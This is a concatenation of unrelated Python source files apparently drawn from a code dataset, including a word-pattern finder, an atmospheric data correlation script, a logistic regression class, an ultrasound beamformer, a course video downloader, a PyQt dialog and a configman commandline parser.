# word_count = {}
# #用一个字典保存, key为发现的文本模式, 键值为匹配该模式的词典中的词的数目
# mod_list = []
# #文本模式以列表形式保存
# word_match = {}
# for file in file_list:
# with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
# p = 5
# q = 5
# txt_file = modified(txt_fr.read())
# if len(txt_file) > 0:
# for word in word_list:
# loc_list = [w.start() for w in re.finditer(word, txt_file)]
# for loc in loc_list:
# for i in range(1, (p+1)):
# for j in range(1,(q+1)):
# if loc - i >= 0 and loc + len(word) + j <len(txt_file):
# ext_word = txt_file[loc - i: loc + len(word) + j]
# ext_wd = some_little_modify(ext_word)
# local_ind = ext_wd.index(some_little_modify(word))
# try:
# #mod = re.compile(ext_wd[:local_ind]+'(\S{%d})'%len(word)+ext_wd[local_ind+len(word):])
# mod = (ext_wd[:local_ind], ext_wd[local_ind+len(word):])
# except re.error:
# print (word + '\t\t' + ext_word + '\n')
# if mod not in mod_list:
# mod_list.append(mod)
# word_match[mod] = {word}
# else:
# word_match[mod].add(word)
# for mod in mod_list:
# word_count[mod] = len(word_match[mod])
# return mod_list, word_count, word_match
# def find_word(path, mod_list, dic):
# """用发现的模式去发现文本中的新词"""
# file_list = os.listdir(path)
# word_list = read_dict(dic)
# mod_count = {}
# #键为发现的模式, 相应的值为匹配到的词的数目
# mod_match = {}
# #键为发现的模式, 相应的值为匹配到的词的集合
# new_word = set()
# #匹配到的新词的集合
# for mod in mod_list:
# wor_set = set()
# for file in file_list:
# with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
# txt_file = modified(txt_fr.read())
# left_index = [w.start() for w in re.finditer(mod[0], txt_file)]
# right_index = [w.start() for w in re.finditer(mod[1], txt_file)]
# start = 0
# for i in range(len(left_index)):
# for j in range(start, len(right_index)):
# if right_index[j] > left_index[i] and right_index[j] <= left_index[i+1]:
# word = text_file[left_index[i], right_index[j]]
# wor_set.add(word)
# start += 1
# break
# elif right_index[j] > left_index[i+1]:
# break
# else:
# start += 1
# #wor_set = wor_set.difference(set(word_list))
# num_extract = len(wor_set)
# mod_count[mod] = num_extract
# mod_match[mod] = wor_set
# new_word = new_word.union(wor_set)
# new_word = new_word.difference(set(word_list))
# return new_word, mod_count, mod_match
| StarcoderdataPython |
4966018 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 27 12:46:12 2021
@author: zaidanma
"""
import pandas as pd
import numpy as np
from sklearn import feature_selection
from Functions.Functions import sunreset
#import matplotlib.pyplot as plt

# Feature-exploration script: ranks SMEAR II station variables against the
# H2SO4 tower measurement using Pearson/Spearman correlation and mutual
# information, then intersects the two rankings.
SMEAR2 = pd.read_excel("SMEARII/SMEAR2.xlsx")
dtypes_SMEAR2 = SMEAR2.dtypes
col_names2 = SMEAR2.columns

# When enabled, night-time rows are replaced by NaN so only daylight data
# enters the correlation analysis.
FilterSun = 1
if FilterSun == 1:
    print('We filter the evening data')
    # Hyytiala: UTC offset H and station coordinates.
    H = 3; latitude = 61 + 51/60; longitude = 24 + 17/60
    SMEAR2_,SMEAR2_nannight = sunreset(latitude, longitude, H, SMEAR2)
    SMEAR2 = SMEAR2_nannight.copy()
else:
    print('No filter')

SMEAR2a = SMEAR2.set_index('Time')
dtypes_SMEAR2a = SMEAR2a.dtypes
col_names2a = SMEAR2a.columns
# SMEAR2a = SMEAR2a_nannight.copy()

# Pairwise correlation matrices over all station variables.
Rp = SMEAR2a.corr(method ='pearson')
Rs = SMEAR2a.corr(method ='spearman')

# Arrange variables based on Pearson and Spearman correlations
# https://newbedev.com/sorting-by-absolute-value-without-changing-the-data
# NOTE(review): both matrices are ordered by the *Pearson* |r| against
# 'H2SO4_tower' (Rp appears in both argsort calls) — confirm intended.
Rp1 = Rp.iloc[Rp['H2SO4_tower'].abs().argsort()]
Rs1 = Rs.iloc[Rp['H2SO4_tower'].abs().argsort()]
Rpearson = Rp1.index
Rspearman = Rs1.index

## MUTUAL INFORMATION
# https://stackoverflow.com/questions/29120626/removing-nans-in-numpy-arrays
# https://scikit-learn.org/stable/modules/generated/sklearn.feature_selection.mutual_info_regression.html
SMEAR2b = SMEAR2a.to_numpy()
type(SMEAR2b)
# Z = np.column_stack((SMEAR2b[:,0],SMEAR2b[:,1]))

# Mutual information of each column against column 0 (the target), computed
# pairwise on rows where both values are present.
# NOTE(review): range(N-1) leaves the last column's MI at its zero initial
# value — confirm whether the final column should be included.
N = SMEAR2b.shape[1]
MI = np.zeros([1,N])
for n in range(N-1):
    X = SMEAR2b[:,0]
    Y = SMEAR2b[:,n]
    idx = np.where(~np.isnan(X+Y))
    if len(idx[0]) == 0:
        # No overlapping valid samples: MI is undefined for this pair.
        MI[0,n] = np.nan
    else:
        X = X[idx]
        Y = Y[idx]
        X = X.reshape((X.shape[0], 1))
        Y = Y.reshape((Y.shape[0], 1))
        # sklearn.feature_selection.mutual_info_regression(X, y)
        MI[0,n] = feature_selection.mutual_info_regression(X, Y)

from Functions.Functions import highest_correlation

# Mutual Information ranking.
Col_names = col_names2a
CorrVars = MI
Col_namesMI, MIf = highest_correlation(Col_names,CorrVars)

# Spearman correlation ranking.
Col_names = col_names2a
CorrVars0 = Rs['H2SO4_tower'].to_numpy()
CorrVars = CorrVars0.reshape((1, CorrVars0.shape[0]))
Col_namesRs, MISpf = highest_correlation(Col_names,CorrVars)

Col_namesMI_ = Col_namesMI[0]
Col_namesRs_ = Col_namesRs[0]
# Despite the *_top20 names, the slices below keep the top 50 variables.
Col_namesMI_top20 = Col_namesMI_[0:50,0]
Col_namesRs_top20 = Col_namesRs_[0:50,0]
Top20_ = set(Col_namesMI_top20) & set(Col_namesRs_top20)
Top20 = list(Top20_)

# Report where SO2 lands in each ranking.
n = -1
for s in Col_namesRs_:
    n = n + 1
    if "SO2" in s[0]:
        print("var SO2 is on the importance number (Spearman): "+str(n))
n = -1
for s in Col_namesMI_:
    n = n + 1
    if "SO2" in s[0]:
        print("var SO2 is on the importance number (MI): "+str(n))
print('The size of Top 50 correlated variables is: ' + str(len(Top20)))

# https://stackoverflow.com/questions/4843158/check-if-a-string-is-a-substring-of-items-in-a-python-list-of-strings
var_word = 'SO2'
matching = [s for s in Top20 if var_word in s]
print(matching)

#%%
# OTHER STEPS:
# 1. sunset and sunrise filters, and re-calculate the correlation
# 2. H2SO4 diurnal cycles and monthly diurnal cycles + subset/sunlight
# NEXT STEPS (to be done):
# 1. Do we need to normalize data for X and Y, do we need to normalize them?
# 2. We make a comparison between MI, Rp and Rs
#    For example, we can choose the first 10 vars, and find the intersections
#    between Rs and MI
# 3. We group the correlations between their groups, such as RH, Temp, etc.
# 4. We select the most appropriate vars (max 5) to model H2SO4
# Also, investigate these:
# https://scikit-learn.org/stable/auto_examples/feature_selection/plot_f_test_vs_mi.html
# https://machinelearningmastery.com/feature-selection-for-regression-data/
# https://medium.com/@hertan06/which-features-to-use-in-your-model-350630a1e31c
3284695 | <filename>machine_learning/regression/LogisticRegression.py<gh_stars>1-10
__author__ = "<NAME>"
__copyright__ = "Free to use, copy and modify"
__credits__ = ["<NAME>"]
__license__ = "MIT Licence"
__version__ = "0.0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
import numpy as np
import importlib
import math
import os.path
if not importlib.find_loader('matplotlib') is None:
import matplotlib.pyplot as plt
else:
print("WARNING! matplotlicb package was not installed on the vm. Plotting functionalities will not work.")
from ml_util.math_helpers import sigmoid, get_polynomial, cross_multiplication
from machine_learning.CostMinimizerBase import CostMinimizerBase
class LogisticRegression(CostMinimizerBase):
    """Binary logistic regression trained via the CostMinimizerBase driver.

    Supplies the sigmoid cross-entropy cost, its gradients (both optionally
    L2-regularized through ``lambdaRate``) and a 0/1 decision rule at the
    conventional 0.5 threshold.
    """

    def __init__(self, iterations, alpha, includeBias = False, doNormalize = False, lambdaRate = 0.0, mapping = None, labelCount=1):
        # Bug fix: the caller-supplied labelCount used to be discarded in
        # favour of a hard-coded labelCount=1, which silently broke
        # one-vs-all multi-class training.
        return super().__init__(iterations, alpha, includeBias, doNormalize, lambdaRate, mapping, labelCount=labelCount)

    def compute_cost(self, theta, classIndex):
        """Return the (optionally regularized) cross-entropy cost for ``theta``.

        ``classIndex`` selects which label column is treated as the positive
        class by ``get_labeled_set``.
        """
        y = self.get_labeled_set(classIndex)
        z = np.dot(theta, self.x)
        h = sigmoid(z)
        # Mean negative log-likelihood: -(1/m) * [y*log(h) + (1-y)*log(1-h)]
        cost = (-1 * (1.0 / float(self.m)) * (np.dot(np.log(h), y) + np.dot(np.log(1 - h), (1 - y)))).item(0, 0)
        if self.lambdaRate > 0.0:
            cost = self.regularize_cost(cost, theta)
        return cost

    def compute_grads(self, theta, classIndex):
        """Return the gradient of the cross-entropy cost w.r.t. ``theta``."""
        y = self.get_labeled_set(classIndex)
        z = np.dot(theta, self.x)
        h = sigmoid(z)
        grads = (1.0 / float(self.m)) * np.dot((h - y.transpose()), self.x.transpose())
        if self.lambdaRate > 0.0:
            grads = self.regularize_grads(grads, theta)
        return grads

    def predict(self):
        """Return a list of 0.0/1.0 class decisions for every training sample."""
        z = np.dot(self.theta, self.x)
        h = sigmoid(z)
        return [0.0 if x < 0.5 else 1.0 for x in np.asarray(h)[0, :]]
9615862 | <gh_stars>1-10
"""
Copyright (C) 2021 ETH Zurich. All rights reserved.
Author: <NAME>, ETH Zurich
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Basic libraries
import numpy as np
from os.path import dirname, abspath
import sys
import time
# Import pybf modules
from pybf.pybf.io_interfaces import ImageSaver
from pybf.pybf.image_settings import ImageSettings
from pybf.pybf.delay_calc import calc_propagation_delays
from pybf.pybf.delay_calc import convert_time_to_samples
from pybf.pybf.apodization import calc_fov_receive_apodization
from pybf.pybf.signal_processing import demodulate_decimate
from pybf.pybf.signal_processing import interpolate_modulate
from pybf.pybf.signal_processing import filter_band_pass
from pybf.pybf.signal_processing import hilbert_interpolate
# from pybf.scripts.visualize_image_dataset import visualize_image_dataset
from pybf.scripts.beamformer_cartesian_realtime import BFCartesianRealTime
# Constants
LATERAL_PIXEL_DENSITY_DEFAULT = 5
ALPHA_FOV_APOD_ANGLE_DEFAULT = 50
DB_RANGE_DEFAULT = 40
IMAGE_RESOLUTION_DEFAULT = [100, 100]
class BFCartesianReference(BFCartesianRealTime):
    """Reference (offline) Cartesian delay-and-sum beamformer.

    Extends BFCartesianRealTime but additionally retains the per-pixel
    delayed channel data (``bf_data``) and the apodization mask (``mask``)
    produced during delay-and-sum, and restricts summation to a
    Hanning-weighted ``channel_reduction``-wide sub-aperture centred on the
    array.
    """

    def __init__(self,
                 f_sampling,
                 tx_strategy,
                 transducer_obj,
                 decimation_factor,
                 interpolation_factor,
                 image_res,
                 img_config_obj,
                 db_range=DB_RANGE_DEFAULT,
                 start_time=None,
                 correction_time_shift=None,
                 alpha_fov_apod=ALPHA_FOV_APOD_ANGLE_DEFAULT,
                 bp_filter_params=None,
                 envelope_detector='I_Q',
                 picmus_dataset=False,
                 channel_reduction=None):
        # Delegate all common setup to the real-time beamformer; the
        # is_inherited=False flag keeps the parent's own initialisation path.
        super(BFCartesianReference, self).__init__(f_sampling, tx_strategy, transducer_obj,
                                                   decimation_factor, interpolation_factor, image_res,
                                                   img_config_obj, db_range, start_time,
                                                   correction_time_shift,
                                                   alpha_fov_apod,
                                                   bp_filter_params,
                                                   envelope_detector,
                                                   picmus_dataset,
                                                   channel_reduction=channel_reduction,
                                                   is_inherited=False)
        self.channel_reduction = channel_reduction
        # Filled by beamform(): raw delayed channel data per acquisition and
        # the last apodization mask returned by _delay_and_sum.
        self.bf_data = []
        self.mask = []

    # Beamform the data using selected BF-core
    def beamform(self, rf_data, numba_active=False):
        """Beamform one frame and return the coherently compounded image.

        rf_data is (n_samples x n_elements) for a single acquisition or
        (n_acqs x n_samples x n_elements) for several; the result is
        reshaped to (image_res[1], image_res[0]).
        """
        print('Beamforming...')
        print (' ')
        start_time = time.time()
        # One entry per transmit event (rows of the TX delay table).
        acqs_to_process = [x for x in range(self._tx_delays_samples.shape[0])]
        # Allocate the data
        das_out = np.zeros((len(acqs_to_process), self._pixels_coords.shape[1]), dtype = np.complex128)
        # Check length
        # If 2D array is given and we need to process a single acquisition
        # then reshape the array
        if len(rf_data.shape) == 2 and len(acqs_to_process) == 1:
            rf_data_reshaped = rf_data.reshape((1, rf_data.shape[0], rf_data.shape[1]))
        # If we have more than one acquisition and dimensions are aligned do nothing
        elif len(rf_data.shape) == 3 and len(acqs_to_process) == rf_data.shape[0]:
            rf_data_reshaped = rf_data
        else:
            # NOTE(review): only warns — a shape mismatch falls through and
            # raises NameError on rf_data_reshaped below.
            print('Input data shape ', rf_data.shape, ' is incorrect.')
        # Iterate over acquisitions
        for i in acqs_to_process:
            rf_data_proc = self._preprocess_data(rf_data_reshaped[i, :, :])
            rf_data_proc_trans = np.transpose(rf_data_proc)
            # Summ up Tx and RX delays
            delays_samples = self._rx_delays_samples + self._tx_delays_samples[i, :]
            # Make delay and sum operation + apodization
            das_out[i,:], raw_data, self.mask = self._delay_and_sum(rf_data_proc_trans,
                                                                    delays_samples.reshape(1, delays_samples.shape[0], -1))
            # Keep the raw delayed channel data for offline inspection.
            self.bf_data.append(raw_data)
        self.bf_data = np.asarray(self.bf_data)
        # Coherent compounding
        das_out_compound = np.sum(das_out[acqs_to_process, :], axis = 0)
        # Print execution time
        print('Time of execution: %s seconds' % (time.time() - start_time))
        return das_out_compound.reshape(self._image_res[1], self._image_res[0])

    # Perform delay and sum operation with numpy
    # Input: rf_data_in of shape (n_samples x n_elements)
    #        delays_idx of shape (n_modes x n_elements x n_points)
    # Returns: (das_out, das_data, data_mask) — the per-pixel sums, the
    #          delayed channel samples of the reduced aperture, and the
    #          apodization mask used to skip irrelevant pixels.
    def _delay_and_sum(self, rf_data_in, delays_idx):
        n_elements = rf_data_in.shape[1]
        n_modes = delays_idx.shape[0]
        n_points = delays_idx.shape[2]
        # Add one zero sample for data array (in the end)
        rf_data_shape = rf_data_in.shape
        rf_data = np.zeros((rf_data_shape[0] + 1, rf_data_shape[1]), dtype=np.complex64)
        rf_data[:rf_data_shape[0],:rf_data_shape[1]] = rf_data_in
        # If delay index exceeds the input data array dimensions,
        # write -1 (it will point to 0 element)
        delays_idx[delays_idx >= rf_data_shape[0] - 1] = -1
        # Choose the right samples for each channel and point
        # using numpy fancy indexing
        # Create array for fancy indexing of channels
        # of size (n_modes x n_points x n_elements)
        # The last two dimensions are transposed to fit the rf_data format
        fancy_idx_channels = np.arange(0, n_elements)
        fancy_idx_channels = np.tile(fancy_idx_channels, (n_modes, n_points, 1))
        # Create array for fancy indexing of samples
        # of size (n_modes x n_points x n_elements)
        # The last two dimensions are transposed to fit the rf_data format
        fancy_idx_samples = np.transpose(delays_idx, axes = [0, 2, 1])
        # Make the delay and sum operation by selecting the samples
        # using fancy indexing,
        # multiplying by apodization weights (optional)
        # and then summing them up along the last axis
        #######################################################################
        # DAS goes here
        # Keep only a centred sub-aperture of channel_reduction elements.
        channel_reduction = self.channel_reduction
        ch_nr = n_elements
        start_i = int(np.ceil((ch_nr - channel_reduction)/2))
        stop_i = int(start_i + channel_reduction)
        # Weights: Hanning window across the reduced aperture.
        das_weights = np.hanning(self.channel_reduction)
        das_data = rf_data[fancy_idx_samples, fancy_idx_channels][0,:,start_i:stop_i]
        das_out = np.zeros(das_data.shape[0], dtype=np.complex64)
        data_mask = self._apod[:,start_i:stop_i]
        for i in range(0, das_data.shape[0]):
            # Skip irrelevant points
            if (np.sum(data_mask[i,:]) == 0):
                continue
            das_out[i] = np.sum(np.multiply(das_data[i,:], das_weights))
        #######################################################################
        # Output shape: (n_modes x n_points)
        return das_out, das_data, data_mask
6419342 | #! /usr/bin/env python
#-*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import os
class Tutsplus:
login_url= 'https://tutsplus.com/amember/login.php'
def __init__(self, username, password):
self.username = username
self.password = password
self.login()
# Return the html source for a specified url
def get_source(self, url):
r = self.s.get(url)
return r.content
# It logs in and store the sesson for the future requests
def login(self):
self.s = requests.session()
soup = BeautifulSoup(self.get_source(self.login_url))
login_attempt_id = soup.find_all(attrs={"name": "login_attempt_id"})[0]['value']
data = {
"amember_login":self.username,
"amember_pass":<PASSWORD>,
"remember_login":1,
'login_attempt_id' : login_attempt_id
}
self.s.post(self.login_url, data = data)
return True
# Download all video from a course url
def download_course(self, url):
# Variable needed to increment the video number
self.video_number = 1
source = self.get_source(url)
soup = BeautifulSoup(source)
# the course's name
self.course_title = soup.select('.title-text')[0].string
if not os.path.exists(self.course_title) :
os.makedirs(self.course_title)
# array who stores the information about a course
course_info = self.get_info_from_course(soup)
for video in course_info:
print "[+] Downloading " + video['titolo']
self.download_video(video)
self.video_number = self.video_number + 1
def download_courses(self,courses):
for course in courses:
self.download_course(course)
# pass in the info of the lesson and it will download the video
# lesson = {
# "titolo": 'video title',
# "link" : 'http://link_to_download'
# }
def download_video(self,lesson):
source = self.get_source(lesson['link'])
soup = BeautifulSoup(source)
download_link= soup.select('.post-buttons > a')
# If it finds more than 1 download link it will skip
# the video files and will download the video only
if len(download_link) == 1:
download_link = download_link[0]
else:
download_link = download_link[1]
# String name of the file
name = self.course_title + '/[' + str(self.video_number) + '] ' + lesson['titolo'].replace('/','-')
self.download_file(download_link['href'],name)
print '[*] Downloaded > ' + lesson['titolo']
# Function who downloads the file itself
def download_file(self,url, name):
# name = url.split('/')[-1]
# NOTE the stream=True parameter
name = name + '.mp4'
r = self.s.get(url, stream=True)
if not os.path.isfile(name) :
with open(name, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
return name
# return an array with all the information about a video (title, url)
def get_info_from_course(self, soup):
arr = []
videos = soup.select('.section-title > a')
for video in videos:
if video.string is not None:
titolo = video.string
link = video['href']
info = {
"titolo":titolo,
"link":link
}
arr.append(info)
return arr
| StarcoderdataPython |
11211422 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ItemEditor.ui'
#
# Created: Thu Jan 1 18:00:12 2015
# by: PyQt4 UI code generator 4.10.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Qt compatibility shims emitted by pyuic4: fall back to identity/default
# behaviour when the QString UTF-8 helpers are unavailable (PyQt API v2).
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_ItemEditor(object):
    """pyuic4-generated UI builder for the 'Items' editor dialog.

    Auto-generated from ItemEditor.ui — regenerate rather than hand-edit.
    """

    def setupUi(self, ItemEditor):
        """Create and lay out the widgets of the ItemEditor dialog."""
        ItemEditor.setObjectName(_fromUtf8("ItemEditor"))
        ItemEditor.resize(714, 429)
        self.gridLayout = QtGui.QGridLayout(ItemEditor)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        # Item tree: one column per stat, one top-level row per item category.
        self.items = QtGui.QTreeWidget(ItemEditor)
        self.items.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        self.items.setObjectName(_fromUtf8("items"))
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        item_0 = QtGui.QTreeWidgetItem(self.items)
        self.gridLayout.addWidget(self.items, 0, 0, 1, 1)
        self.buttonBox = QtGui.QDialogButtonBox(ItemEditor)
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
        self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
        self.retranslateUi(ItemEditor)
        QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("accepted()")), ItemEditor.accept)
        QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("rejected()")), ItemEditor.reject)
        QtCore.QMetaObject.connectSlotsByName(ItemEditor)

    def retranslateUi(self, ItemEditor):
        """Apply all translatable strings (window title, headers, row labels)."""
        ItemEditor.setWindowTitle(_translate("ItemEditor", "Items", None))
        self.items.headerItem().setText(0, _translate("ItemEditor", "Name", None))
        self.items.headerItem().setText(1, _translate("ItemEditor", "Price", None))
        self.items.headerItem().setText(2, _translate("ItemEditor", "Fuel", None))
        self.items.headerItem().setText(3, _translate("ItemEditor", "Speed", None))
        self.items.headerItem().setText(4, _translate("ItemEditor", "Food", None))
        self.items.headerItem().setText(5, _translate("ItemEditor", "Sanity", None))
        self.items.headerItem().setText(6, _translate("ItemEditor", "Attack", None))
        self.items.headerItem().setText(7, _translate("ItemEditor", "Defense", None))
        # Sorting is disabled while the static rows are filled, then restored.
        __sortingEnabled = self.items.isSortingEnabled()
        self.items.setSortingEnabled(False)
        self.items.topLevelItem(0).setText(0, _translate("ItemEditor", "Engine", None))
        self.items.topLevelItem(1).setText(0, _translate("ItemEditor", "Fuel", None))
        self.items.topLevelItem(2).setText(0, _translate("ItemEditor", "Food", None))
        self.items.topLevelItem(3).setText(0, _translate("ItemEditor", "Ship improvements", None))
        self.items.topLevelItem(4).setText(0, _translate("ItemEditor", "Special food", None))
        self.items.topLevelItem(5).setText(0, _translate("ItemEditor", "Machine", None))
        self.items.topLevelItem(6).setText(0, _translate("ItemEditor", "Gun", None))
        self.items.topLevelItem(7).setText(0, _translate("ItemEditor", "Ship weapon", None))
        self.items.topLevelItem(8).setText(0, _translate("ItemEditor", "Ship shield", None))
        self.items.setSortingEnabled(__sortingEnabled)
| StarcoderdataPython |
3590004 | <reponame>peterbe/configman
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is configman
#
# The Initial Developer of the Original Code is
# Mozilla Foundation
# Portions created by the Initial Developer are Copyright (C) 2011
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# <NAME>, <EMAIL>
# <NAME>, <EMAIL>
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
"""This module implements a configuration value source from the commandline.
It uses getopt in its implementation. It is thought that this implementation
will be supplanted by the argparse implementation when using Python 2.7 or
greater.
This module declares that its ValueSource constructor implementation can
handle the getopt module or a list. If specified as the getopt module, the
constructor will fetch the source of argv from the configmanager that was
passed in. If specified as a list, the constructor will assume the list
represents the argv source."""
import getopt
import collections
from .. import dotdict
from .. import option
from .. import namespace
from ..config_exceptions import NotAnOptionError
from .. import converters as conv
from source_exceptions import ValueException, CantHandleTypeException
class GetOptFailureException(ValueException):
    """Raised when getopt fails to process the commandline argument source."""
    pass
can_handle = (getopt,
list, # a list of options to serve as the argv source
)
class ValueSource(object):
    """The ValueSource implementation for the getopt module. This class will
    interpret an argv list of commandline arguments using getopt."""

    def __init__(self, source, the_config_manager=None):
        # 'source' is either the getopt module itself (use the config
        # manager's argv_source) or a sequence standing in for argv.
        if source is getopt:
            self.argv_source = the_config_manager.argv_source
        elif isinstance(source, collections.Sequence):
            self.argv_source = source
        else:
            raise CantHandleTypeException("don't know how to handle"
                                          " %s." % str(source))

    def get_values(self, config_manager, ignore_mismatches):
        """This is the black sheep of the crowd of ValueSource implementations.
        It needs to know ahead of time all of the parameters that it will need,
        but we cannot give it.  We may not know all the parameters because
        not all classes may have been expanded yet.  The two parameters allow
        this ValueSource implementation to know what the parameters have
        already been defined.  The 'ignore_mismatches' parameter tells the
        implementation if it can or cannot ignore extraneous commandline
        options.  The last time this function is called, it will be required
        to test for illegal commandline options and respond accordingly.

        Returns a DotDict mapping option names to their commandline values.
        Raises NotAnOptionError for unknown switches (unless ignored).
        """
        short_options_str, \
            long_options_list = self.getopt_create_opts(
                config_manager.option_definitions)
        try:
            # Lenient parsing ignores unknown switches; strict parsing raises.
            if ignore_mismatches:
                fn = ValueSource.getopt_with_ignore
            else:
                fn = getopt.gnu_getopt
            # here getopt looks through the command line arguments and
            # consumes the defined switches.  The things that are not
            # consumed are then offered as the 'args' variable of the
            # parent configuration_manager
            getopt_options, config_manager.args = fn(self.argv_source,
                                                     short_options_str,
                                                     long_options_list)
        except getopt.GetoptError, x:
            raise NotAnOptionError(str(x))
        command_line_values = dotdict.DotDict()
        for opt_name, opt_val in getopt_options:
            if opt_name.startswith('--'):
                name = opt_name[2:]
            else:
                # single-dash switch: map the short form back to its
                # fully-qualified long name
                name = self.find_name_with_short_form(opt_name[1:],
                                                      config_manager.option_definitions,
                                                      '')
                if not name:
                    raise NotAnOptionError('%s is not a valid short'
                                           ' form option' % opt_name[1:])
            option_ = config_manager._get_option(name)
            if option_.from_string_converter == conv.boolean_converter:
                # boolean switches take no argument: their presence on the
                # commandline toggles the default value
                command_line_values[name] = not option_.default
            else:
                command_line_values[name] = opt_val
        return command_line_values

    def getopt_create_opts(self, option_definitions):
        """Build the (short_options_str, long_options_list) pair that
        getopt expects, from the nested option definitions."""
        short_options_list = []
        long_options_list = []
        self.getopt_create_opts_recursive(option_definitions,
                                          "",
                                          short_options_list,
                                          long_options_list)
        short_options_str = ''.join(short_options_list)
        return short_options_str, long_options_list

    def getopt_create_opts_recursive(self, source,
                                     prefix,
                                     short_options_list,
                                     long_options_list):
        """Walk the (possibly nested) option namespace, accumulating getopt
        specs.  Nested namespaces yield dotted long names; boolean options
        take no argument (no trailing ':'/'=')."""
        for key, val in source.items():
            if isinstance(val, option.Option):
                boolean_option = type(val.default) == bool
                if val.short_form:
                    try:
                        if boolean_option:
                            if val.short_form not in short_options_list:
                                short_options_list.append(val.short_form)
                        else:
                            short_with_parameter = "%s:" % val.short_form
                            if short_with_parameter not in short_options_list:
                                short_options_list.append(short_with_parameter)
                    except AttributeError:
                        pass
                if boolean_option:
                    long_options_list.append('%s%s' % (prefix, val.name))
                else:
                    long_options_list.append('%s%s=' % (prefix, val.name))
            elif isinstance(val, option.Aggregation):
                pass  # skip Aggregations they have nothing to do with getopt
            else:  # Namespace case
                new_prefix = '%s%s.' % (prefix, key)
                self.getopt_create_opts_recursive(val,
                                                  new_prefix,
                                                  short_options_list,
                                                  long_options_list)

    #--------------------------------------------------------------------------
    @staticmethod
    def getopt_with_ignore(args, shortopts, longopts=[]):
        """my_getopt(args, options[, long_options]) -> opts, args

        This function works like gnu_getopt(), except that unknown parameters
        are ignored rather than raising an error.
        """
        opts = []
        prog_args = []
        if isinstance(longopts, str):
            longopts = [longopts]
        else:
            longopts = list(longopts)
        while args:
            if args[0] == '--':
                # bare '--' terminates option parsing; the rest is positional
                prog_args += args[1:]
                break
            if args[0][:2] == '--':
                try:
                    opts, args = getopt.do_longs(opts, args[0][2:],
                                                 longopts, args[1:])
                except getopt.GetoptError:
                    # unknown long option: keep it as a program argument
                    prog_args.append(args[0])
                    args = args[1:]
            elif args[0][:1] == '-':
                try:
                    opts, args = getopt.do_shorts(opts, args[0][1:], shortopts,
                                                  args[1:])
                except getopt.GetoptError:
                    # unknown short option: keep it as a program argument
                    prog_args.append(args[0])
                    args = args[1:]
            else:
                prog_args.append(args[0])
                args = args[1:]
        return opts, prog_args

    #--------------------------------------------------------------------------
    def find_name_with_short_form(self, short_name, source, prefix):
        """Return the dotted long name whose option has the given one-letter
        short form, searching nested namespaces; None if not found."""
        for key, val in source.items():
            type_of_val = type(val)
            if type_of_val == namespace.Namespace:
                new_prefix = '%s.' % key
                name = self.find_name_with_short_form(short_name, val,
                                                      new_prefix)
                if name:
                    return name
            else:
                try:
                    if short_name == val.short_form:
                        return '%s%s' % (prefix, val.name)
                except KeyError:
                    # NOTE(review): relies on DotDict raising KeyError for a
                    # missing short_form attribute — a plain object would
                    # raise AttributeError instead; confirm.
                    continue
        return None
| StarcoderdataPython |
1895510 | <filename>senlin/api/openstack/v1/cluster_policies.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
